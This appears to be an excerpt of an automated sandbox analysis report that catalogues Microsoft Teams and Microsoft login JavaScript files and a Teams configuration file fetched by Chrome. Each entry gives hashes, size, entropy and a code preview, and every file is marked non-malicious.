                                                                                                                                                                                                                                                                            SHA-512:9F2E910C556B9525328E0DE5B1105475442FE4B915D237F3DF328548F4D936739182DE3D862AC068B28380435CA5F49D4FFA3F5194274221F6512DD73EE24C12
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/208766-422165fd3b0a4243.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[208766],{277362:(e,t,n)=>{n.d(t,{p:()=>a});const a={AcceptSharedChannelInvitationDialog:"AcceptSharedChannelInvitationDialog",AccessibilitySettingsPanelButton:"AccessibilitySettingsPanelButton",AccountLocaleChangeNotificationJob:"AccountLocaleChangeNotificationJob",AccountSelectionDialog:"AccountSelectionDialog",ActivityFeed:"ActivityFeed",ActivityFeedBellClick:"ActivityFeedBellClick",ActivitySlices:"ActivitySlices",ActivitySlicesPopOutButton:"ActivitySlicesPopOutButton",AcceptInvitationFromAccountAndSettingPage:"AcceptInvitationFromAccountAndSettingPage",AdaptiveCardInvokeButton:"AdaptiveCardInvokeButton",AddAccountFromButton:"AddAccountFromButton",AddAccountFromMeMenu:"AddAccountFromMeMenu",AddAccountFromSettings:"AddAccountFromSettings",AddAccountFromSignoutDialog:"AddAccountFromSignoutDialog",AddCloudStorageFolderDialog:"AddCloudStorageFolderDialog",AddGoogleContactsSyncE
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (40220)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):40327
                                                                                                                                                                                                                                                                            Entropy (8bit):4.982499934637003
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:fnQ8wUfUOoo9OiHjtwTV0iwiT1UvlPBwef4Z02dW+yGPORt1PnV6gPnn4PFKMtAl:0UfUOoo9OCt9ludW+yGPOdPnn+YTB
                                                                                                                                                                                                                                                                            MD5:C60442CC6612FFEA845F214AE8F289AF
                                                                                                                                                                                                                                                                            SHA1:BC4EEC893D082F696DFE20C5131CE803B8106DC5
                                                                                                                                                                                                                                                                            SHA-256:7B2501E4EFCB6F75738A5E1B1F63E9342265E0D0A88EABA757E5C33B66ABED64
                                                                                                                                                                                                                                                                            SHA-512:0DC5D6588C04496E59F88358B65B18A7A5647D3C28CE911E3399643923B3893F74BDC2C7E9906878439390A64C59AA39537F1EE318775450A246CB4DF9471DA0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[52085],{848020:(e,t,a)=>{a.d(t,{aS:()=>i,a7:()=>n,as:()=>o,Mb:()=>r,el:()=>s,Av:()=>l,nb:()=>c,Jw:()=>m,hz:()=>d,gs:()=>g,p8:()=>p,cy:()=>u,O:()=>h});const i={Anonymous:"Anonymous",Aad:"Aad",Msa:"Msa",MsaLife:"MsaLife",GFed:"GFed",Otp:"Otp"},n={Member:"Member",Anonymous:"Anonymous",Guest:"Guest"},o={Default:"Default",Mto:"Mto",Ccm:"Ccm",Eotp:"Eotp"};var r;!function(e){e[e.Member=0]="Member",e[e.Guest=1]="Guest",e[e.Anonymous=2]="Anonymous",e[e.CrossCloudMeeting=3]="CrossCloudMeeting"}(r||(r={}));const s={prod:"prod",life:"life",dod:"dod",gcch:"gcch",gallatin:"gallatin",airgap08:"airgap08",airgap09:"airgap09"};var l,c,m,d,g,p,u,h;!function(e){e.prod="Global",e.gcch="microsoftonline.us",e.dod="microsoftonline.mil",e.gallatin="partner.microsoftonline.cn",e.gcc="gcc.microsoftonline.com",e.ag08="eaglex.ic.gov",e.ag09="microsoft.scloud"}(l||(l={})),function(e){e.prod="login.microso
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64616)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):449972
                                                                                                                                                                                                                                                                            Entropy (8bit):5.448633694424365
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:07PuGBhXlRK2d/ZkpZYRsmA2pmBe9OpRUS4cEHKE0H3NX44y:07DBZkp6umhpsUSuZ
                                                                                                                                                                                                                                                                            MD5:87A4DD68AE9C7ECAE0D7BE70E3B69108
                                                                                                                                                                                                                                                                            SHA1:86318331A5FAAE3B2430A9F8137CC817741ACE96
                                                                                                                                                                                                                                                                            SHA-256:0030E7479CDC07327AA070FE746F5B2ECD366CE3A6EE1E9E83547DC7703A59E4
                                                                                                                                                                                                                                                                            SHA-512:F715E26312AF1CE8F1E5396CE61CBB5CCF227ED364F09D06FA59CEAA115C28DD77170750F0FF3C2E250F836AB6F562D4EFB3A8F19B91D72A0F34865BEB0FD012
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52213)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):52321
                                                                                                                                                                                                                                                                            Entropy (8bit):5.437222650712969
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:sThOnPn9ptfsLRuSIpQAunOXff4VgsLA6Ch/dY5psmfrUXux8KeP7P6DJVYkCIAo:h9ptfMuSIpQAunafgukNTUw8KSX2jT
                                                                                                                                                                                                                                                                            MD5:B90B4317F4C89B3B5883E64BA41A8BA6
                                                                                                                                                                                                                                                                            SHA1:C5E12D1E07D31322E44E34DA9DD4D70FC095D576
                                                                                                                                                                                                                                                                            SHA-256:2FD2F811EB96348C312B68C5A9E01DED113C95C2C53352EDC6E6496048D4309E
                                                                                                                                                                                                                                                                            SHA-512:9F2E910C556B9525328E0DE5B1105475442FE4B915D237F3DF328548F4D936739182DE3D862AC068B28380435CA5F49D4FFA3F5194274221F6512DD73EE24C12
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[208766],{277362:(e,t,n)=>{n.d(t,{p:()=>a});const a={AcceptSharedChannelInvitationDialog:"AcceptSharedChannelInvitationDialog",AccessibilitySettingsPanelButton:"AccessibilitySettingsPanelButton",AccountLocaleChangeNotificationJob:"AccountLocaleChangeNotificationJob",AccountSelectionDialog:"AccountSelectionDialog",ActivityFeed:"ActivityFeed",ActivityFeedBellClick:"ActivityFeedBellClick",ActivitySlices:"ActivitySlices",ActivitySlicesPopOutButton:"ActivitySlicesPopOutButton",AcceptInvitationFromAccountAndSettingPage:"AcceptInvitationFromAccountAndSettingPage",AdaptiveCardInvokeButton:"AdaptiveCardInvokeButton",AddAccountFromButton:"AddAccountFromButton",AddAccountFromMeMenu:"AddAccountFromMeMenu",AddAccountFromSettings:"AddAccountFromSettings",AddAccountFromSignoutDialog:"AddAccountFromSignoutDialog",AddCloudStorageFolderDialog:"AddCloudStorageFolderDialog",AddGoogleContactsSyncE
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (28012)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):28119
                                                                                                                                                                                                                                                                            Entropy (8bit):5.228116933115004
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:/8Xyeuhomhazs2UksOiRTtBEUkLrJvM7KqvZwP:quXaUcJvM7KAZm
                                                                                                                                                                                                                                                                            MD5:D35DB86B493E76A2724D88D286A8A8D6
                                                                                                                                                                                                                                                                            SHA1:72E04E2FE7724D655650031FC2801FAC761B665E
                                                                                                                                                                                                                                                                            SHA-256:5F8C06DB885B08B2183DAFC11A2B851D897695DFD1F8576BB7893859BC7DE105
                                                                                                                                                                                                                                                                            SHA-512:25967EF3FFB1608B53394390C8A7B795D2462CEE6F09DEB0F8CFF6859CE79526AD612F3ED36F4800CD2819FCD769A6098648D7A981CE48D4DA3443DEA510467E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[96611],{306766:(e,n,t)=>{t.d(n,{u$:()=>i,EY:()=>a,wu:()=>o,fS:()=>l,Xd:()=>r,Zb:()=>s,vT:()=>d});var i,a,o,l,r,s,d;!function(e){e.SingleWindowExperience="single-window-experience",e.MultiWindowExperience="multi-window-experience"}(i||(i={})),function(e){e.NavigatePromiseBiMError="navigate-promise-bim-error",e.DuplicateScenarioCreation="duplicate-scenario-creation",e.IntentIdUndefined="intent-id-undefined"}(a||(a={})),function(e){e.ScenarioNotFound="scenario-not-found",e.IntentNotFoundForCallingWindowingIntentId="intent-not-found-for-calling-windowing-intent-id",e.ContainerNotFoundForCallingWindowingIntentId="container-not-found-for-calling-windowing-intent-id",e.InvalidUpdateType="invalid-update-type",e.ContainerRenderFailed="container-render-failed"}(o||(o={})),function(e){e.CloseContainerFailed="close-container-failed",e.CloseContainerTimeout="close-container-timeout",e.Int
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (45301)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):45412
                                                                                                                                                                                                                                                                            Entropy (8bit):5.252708559945616
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:elgFPa3AeVG1zmfM4ptko1dXkSo9NoVhmPuAABrglrPnGdnYMNOnSWH//LcdMvUi:s3XocRJd3nYMNOpLcCUMF/8ducIONOZv
                                                                                                                                                                                                                                                                            MD5:8E378799CC94AF45251563E58CDAFB42
                                                                                                                                                                                                                                                                            SHA1:5310A1B163FD4AC8ADE13A6030F1A67B5EB7478A
                                                                                                                                                                                                                                                                            SHA-256:AA33FB2D4DC806528EC08D63514A15E47FF6B5202B3C8F4B68DB4DB104EC3BEC
                                                                                                                                                                                                                                                                            SHA-512:346260C5887686FA179CE66D656AD6C0FEC7E02EEC0D4D725ACB8B2DDFE10C0AF409D466063CE4A7F121495D5737329A7F3DC0E6E0AA1DFB198D5669392C1989
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/606492-67dda887dcf8b751.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[606492],{621420:(e,t,s)=>{var i,n;s.d(t,{B:()=>i}),function(e){e.EditorCiq="EditorCiq"}(i||(i={})),function(e){e.light="light",e.dark="dark",e.highContrast="highContrast",e.custom="custom"}(n||(n={}))},911408:(e,t,s)=>{s.d(t,{Gf:()=>i,h7:()=>n,$Z:()=>o});const i="autocomplete-picker-list",n=e=>`autocomplete-picker-item${e}`,o="status-note-compose"},424443:(e,t,s)=>{s.d(t,{dn:()=>o,D0:()=>a,iR:()=>r,kx:()=>h});var i=s(364819),n=s(462034);const o=(e,t)=>s=>(c(e,s),t&&t(s),t=>(Reflect.set(t,Symbol.for("ComposeFramework"),{config:s,type:e}),Object.defineProperty(t,"name",{value:s.name}),t)),a=(e,t={},s)=>{if(!e)return;const[o,a]=r(e);if(!o)return;const c=Reflect.get(o,Symbol.for("ComposeFramework"));if(!c)throw new Error(`Extension not found - ${o.name}`);let h,d={};if(s){const e=new Set(c.config.hooks||[]);if(!(0,i.isEmpty)(e)){const t=new n.U(c.config.name,s);h=t,e.forEach((e=>
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27189)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):27297
                                                                                                                                                                                                                                                                            Entropy (8bit):5.278753153070589
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:4zEhQ+m4/T1f0FE0/9wQsry3HFpNKD2jdHm09St/d6ruizL2Gtg:oEhQruizLo
                                                                                                                                                                                                                                                                            MD5:15436DE719628897F3FBAD88E595CC26
                                                                                                                                                                                                                                                                            SHA1:804B683C22B89172D2FA55D5C0B6755E84C7A556
                                                                                                                                                                                                                                                                            SHA-256:4E79E6FD321A23D5FD6E7A4622B76C4C5CEFB39D797D45B165C0B5344694BEFC
                                                                                                                                                                                                                                                                            SHA-512:24E335A532B08A1D222DEB36B603BA4CD0F707082341A7BF0D0077497A5F3D1515C8779E6A758EA5E701DD50FD0F8086215E23B0885411B5579E9FD370D785A5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/387552-8425a3283a90f51e.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[387552],{28932:(e,t,n)=>{n.d(t,{x:()=>i});const i={0:"OngoingCall",OngoingCall:0,1:"Meeting",Meeting:1,2:"OneToOneCall",OneToOneCall:2,3:"GroupCall",GroupCall:3,4:"AgentMonitorSession",AgentMonitorSession:4}},588534:(e,t,n)=>{var i;n.d(t,{R:()=>i}),function(e){e.ReplyChain="ReplyChain",e.CallHistory="CallHistory",e.CallHistoryDoubleClick="CallHistoryDoubleClick",e.ContactsTab="ContactsTab",e.Dialpad="Dialpad",e.DialpadWithPeoplePicker="DialpadWithPeoplePicker",e.ExchangeContactsTab="ExchangeContactsTab",e.EchoBotCall="EchoBotCall",e.Voicemail="Voicemail",e.RetryCall="RetryCall",e.RejoinCall="RejoinCall",e.RetryCallFromChildWindow="RetryCallFromChildWindow",e.RejoinCallFromChildWindow="RejoinCallFromChildWindow",e.CallingAnonMeetingEndScreen="CallingAnonMeetingEndScreen",e.HIDTriggered="HIDTriggered",e.HIDTriggeredAccept="hidtriggered_accept",e.HIDTriggeredVoipAccept="hidtrigg
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):76664
                                                                                                                                                                                                                                                                            Entropy (8bit):5.383677740005568
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:wXUT8r3L7pLbcDlcVlrQhUdllRQeLSJ55+AvtoWqDX/mSN/H8T7R1t5:byL7dcD6VQP+YoWqDX/mSN/H8T7R1t5
                                                                                                                                                                                                                                                                            MD5:C33EB9A55D51004C111124DE1BB8B177
                                                                                                                                                                                                                                                                            SHA1:09777BAD1B40A331063D10FAC89CECD440852F37
                                                                                                                                                                                                                                                                            SHA-256:AEA2DE896989E277B14135AECE7F4FF8421E9A2B26F5C57C3458E72C2536146F
                                                                                                                                                                                                                                                                            SHA-512:8550F1AE933DBB5CBE8E971FBDCA56D8757352E1204EADE7AE16AFC25115BED9BB227A9EC98ABBFCB997EC94CBDC41C82E455C096BA2C3BBF5DBD292DC512F79
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/688261-29e1c480c81d0be2.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[688261,308346,390601,472903,173388,951007],{414214:(e,t,r)=>{r.d(t,{M:()=>o});var o=function(e){return{attributes:{dismissAction:{"aria-describedby":e.bodyId}}}}},182227:(e,t,r)=>{r.d(t,{K:()=>o});var o=function(){return{attributes:{root:{role:"img","aria-hidden":"true"}}}}},498255:(e,t,r)=>{r.d(t,{K:()=>a});var o=r(953543),n=r(504405),a=function(e){var t;return{attributes:{root:(t={"aria-checked":"mixed"===e.checked?"mixed":!!e.checked,"aria-disabled":e.disabled,role:"checkbox",tabIndex:0},t[n.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:o.ZG}]}}}}}},244211:(e,t,r)=>{r.d(t,{K:()=>c});var o=r(55543),n=r.n(o),a=r(76424),s=r.n(a),l=r(953543),i=r(928879),c=function(e){var t=(0,i.Z)(Object.assign({},e,{inline:!e.contextMenu}));return s()(t,{attributes:{trigger:Object.assign({},e.open&&{"aria-controls":e.menuId},e.open&&!e.contextMenu&&{"aria-expanded":"true
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (41773)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):41881
                                                                                                                                                                                                                                                                            Entropy (8bit):5.370482617886562
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:5ZNH3StVknxinkQQ62Eqrr+rAxvapmEKr0f/rt4g40KH:5ZACUnk/rr+rAxipmLr0f/rj4F
                                                                                                                                                                                                                                                                            MD5:22A4CD1FB7CB4D2F60EE393390C9A796
                                                                                                                                                                                                                                                                            SHA1:3D48FD9A67F1BD5D3E4B5909A4254F5D48469987
                                                                                                                                                                                                                                                                            SHA-256:EADFE9A27CDED1FB816A38BC313A0EA56D7C6633A33B3E2621CF9342FBF8BFAA
                                                                                                                                                                                                                                                                            SHA-512:FF5A1AB495EB01AD640E34A1FE6FA2311781017CB111785D0785EF531AF034E3D172871837EC28F78896D21CC4CB6A9AC0356FFDA6661E7D472BEF8C0A3B04EA
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/674958-37b4889b0bcb5464.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[674958],{428561:function(e,t,n){var o,i;void 0===(i="function"==typeof(o=function(){"use strict";return function(e,t){var n,o,i,a,r,l,s,u,c,d,p,m,f,h,v,g,x,y,b=e.options.window||b,w=b.document,C=this,I=!1,T=!0,E=!0,_={barsSize:{top:44,bottom:"auto"},closeElClasses:["item","caption","zoom-wrap","ui","top-bar"],timeToIdle:4e3,timeToIdleOutside:1e3,loadingIndicatorDelay:1e3,addCaptionHTMLFn:function(e,t){if(!e.title){for(;t.children[0].firstChild;)t.children[0].removeChild(t.children[0].firstChild);return!1}return t.children[0].innerText=e.title,!0},closeEl:!0,captionEl:!0,fullscreenEl:!0,zoomEl:!0,shareEl:!0,counterEl:!0,arrowEl:!0,preloaderEl:!0,tapToClose:!1,tapToToggleControls:!0,clickToCloseNonZoomable:!0,shareButtons:[{id:"facebook",label:"Share on Facebook",url:"https://www.facebook.com/sharer/sharer.php?u={{url}}"},{id:"twitter",label:"Tweet",url:"https://twitter.com/intent/tweet?tex
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (23774)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):23882
                                                                                                                                                                                                                                                                            Entropy (8bit):5.153711856234183
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:xbvNzuDNDJcODNAlioqeB7qNSjnLOkQmGX+g2P/TaZcWZmwrbYMd7svY9YF1vrQO:xbvNzsNDJcODNAlioqeB7qNSVzg2P/uA
                                                                                                                                                                                                                                                                            MD5:0F68D77488B13B60694FF8865D2C5137
                                                                                                                                                                                                                                                                            SHA1:3ABAC8DA7DABDB841331647945C2F7A7AE360FB1
                                                                                                                                                                                                                                                                            SHA-256:9E94D7F6787D2D9CD3E2CBEA298E4C57E6BE6AB73B09BCF7EE3BE4926786E7DF
                                                                                                                                                                                                                                                                            SHA-512:AAD953A529250E1E9D7F41B67758E0F96B1E84B1A25561B3CDA938732C0BD87AC45260D8E7F8898DD668536F46EA597E6F15FFD63F021846E1B7D4A40BE1A969
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[662908],{662908:(e,t,r)=>{r.d(t,{hY:()=>C,dL:()=>P,Xy:()=>M,Rs:()=>H,Fr:()=>U});var n=r(364819),i=r(332752),a=r(802756),s=r(258376),o=r(334499),l=r(175640),c=r(710639);const d=()=>new o.b("div",{});const p=new class{constructor(e={}){this._options={},this.plugins=[],this.nodeError={value:!1,message:""},this.ASTDom=[d()],this.result=[],this._parser=new c.Parser(this,e)}get options(){return this._options}get lastNode(){return this.ASTDom[this.ASTDom.length-1]}onopentag(e,t){const r=new o.b(e,t),n=this.plugins.length;if(n){for(let e=0;e<n;e++){const t=this.plugins[e].exec(this.ASTDom);if(this.nodeError={value:t.error,message:t.errorMessage},this.nodeError.value)break}if(this.nodeError.value)return void this._parser.parseComplete(this.nodeError.message)}this.integrateToAST(r),this.ASTDom.push(r)}ontext(e){if(/\r?\n/.test(e)&&""===e.trim())return;const t=new s.S(e);if(this.lastNod
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (40944)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):41052
                                                                                                                                                                                                                                                                            Entropy (8bit):5.390112837133958
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:1lJDqZGg7/o3vmcQTSowsYReZMV5JPJzWeyqOeqOMcxKCe9DlBSd1dgzzurxGNdd:dD7eJlSxjeZ09KzXeqZ9CIqG+/DLTkBz
                                                                                                                                                                                                                                                                            MD5:80D33287BF24A250F4F9E3AB775F6C07
                                                                                                                                                                                                                                                                            SHA1:5BF597E95CA4CBE34A0020395B17C4123228789F
                                                                                                                                                                                                                                                                            SHA-256:DA6DB9913E2C5FE00C69945E8168AAA0FE8DFDA412094AC20C6854E7F48021D6
                                                                                                                                                                                                                                                                            SHA-512:2EC3406C101380733CB9AA1B3B6912B10CD204264AC0121ECD7C459288686694C9727FD7BA084D60ADB64A1214E64707FE83241AAA8973B9514C3C4A1C495203
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/984459-230ebea54bbba9d2.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[984459],{964324:(e,n,t)=>{t.d(n,{b:()=>a});const a=(0,t(824004).dn)("SideEffect")},916460:(e,n,t)=>{t.d(n,{l:()=>l});var a=t(586892),s=t(390168),i=t(260465);const r=`${s.AN}|(?:s|^)(([\\w\\-~]+\\.)+(?:com|net|org|info|coop|int|co.uk|org\\.uk|ac\\.uk|uk|de|us|co|edu|gov|biz|za|cc|ca|cn|fr|ch|au|in|jp|be|it|nl|mx|no|ru|br|se|es|at|dk|eu|il))`,o=/^(?:(?:ht|f)tp(?:s?):\/\/)?(?:[^@\/\n]+@)?([^:\/?\n,\s"]+)/i,l=(e,n,t,a,s,r,o,l,m)=>({hasAttachment:e&&d(o)&&a,hasCodeSnippet:n&&d(o)&&r.includes("CodeSnippetCard"),hasForbiddenLink:t&&d(o)&&!(0,i.qL)(m)&&c(s,l)}),d=e=>e.some((e=>a.af.isTFLSmsUnVerifiedMri(e)||a.af.isTFLOffNetworkPhoneUser(e)||a.af.isTFLOffNetworkEmailUser(e))),c=(e,n)=>{const t=new RegExp(r,"img"),a=e.trim().split(/\s+|[,]/).join("\n").match(t);return!!a&&(!n||a.some((e=>m(e,n))))},m=(e,n)=>{try{const t=g(e);return n.every((e=>e!==t))}catch{return!0}},g=e=>{const n=e.m
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):523723
                                                                                                                                                                                                                                                                            Entropy (8bit):5.476392943028587
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:5gz+NZzklPJENyqRNwWtSEjdR/ACL4KNet7OGhWLAaySlP49EEL0s:5u+NZzklPJENTjFLbShWLlP42ELd
                                                                                                                                                                                                                                                                            MD5:918FF323F647F6CA805807E281B86A24
                                                                                                                                                                                                                                                                            SHA1:AD993CD0D35971CC942CD9B36E714BF27E250DB9
                                                                                                                                                                                                                                                                            SHA-256:89AAE3BF38520E824B472BF860959359FE6DEFEBDB404C404BC6D72A781F4B75
                                                                                                                                                                                                                                                                            SHA-512:56C3353FC9FACBA7500367848FF458CB87BC752551CE8F4E8CAD4004C86FC44464C974BA56C02180C16BFDD8F5ACDBA93C824C0CA2D6A2EA33E52C54A9CE864F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:{"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary"},"Segmentation":{"EliteUsers":"false","M365CopilotPPVAll":"false","M365ChatAllow":"false","EarlyR2Ring":"false","IsInternalUser":"false","VirtualizationEnabled":"false","TeamsRing":"general","MWWhilteListedUser":"false","Cloud":"Public","AudienceGroup":"general"},"TeamsBuilds":{"BuildSettings":{"MetaosStore":{"BuildVersion":"24103013800"},"WebView2PreAuth":{"x64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x64/24295.605.3225.8804/MSTeams-x64.msix"},"x86":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-x86/24295.605.3225.8804/MSTeams-x86.msix"},"arm64":{"latestVersion":"24295.605.3225.8804","buildLink":"https://installer.teams.static.microsoft/production-windows-arm64/24295.605.3225.8804/MSTeams-arm64.msix"}},"CustomerServiceChatbot":{"BuildVersion":"2024111101"},"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (23865)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):23973
                                                                                                                                                                                                                                                                            Entropy (8bit):5.061416340897368
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:WK8oz4zTk9y1b23kwfxZ8ZyWT+aTx919J63THsp+MaohwYz8XWOFmTRvVMBKJOHp:J8E4zTk/kwf/8ZyWT+aT163THO+MNOYQ
                                                                                                                                                                                                                                                                            MD5:EDDB2A60AB61195FF094AE85C1DE3815
                                                                                                                                                                                                                                                                            SHA1:F94EE597E6C191263FE264045F892F2F922F6D7C
                                                                                                                                                                                                                                                                            SHA-256:4A4F93510554358AA41E4CF43916D09A24D69B9F8156857794B37D2AB6498C16
                                                                                                                                                                                                                                                                            SHA-512:AE67BADE2413A160DFD7BBA53CF2131EAB65F490B70B9C42927C7900401F872A0931379A18E2AFBBA1ACCA093CD39C72BF3DFC38558179B4827623E02A610217
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/965787-5b58e72ef92ce381.js
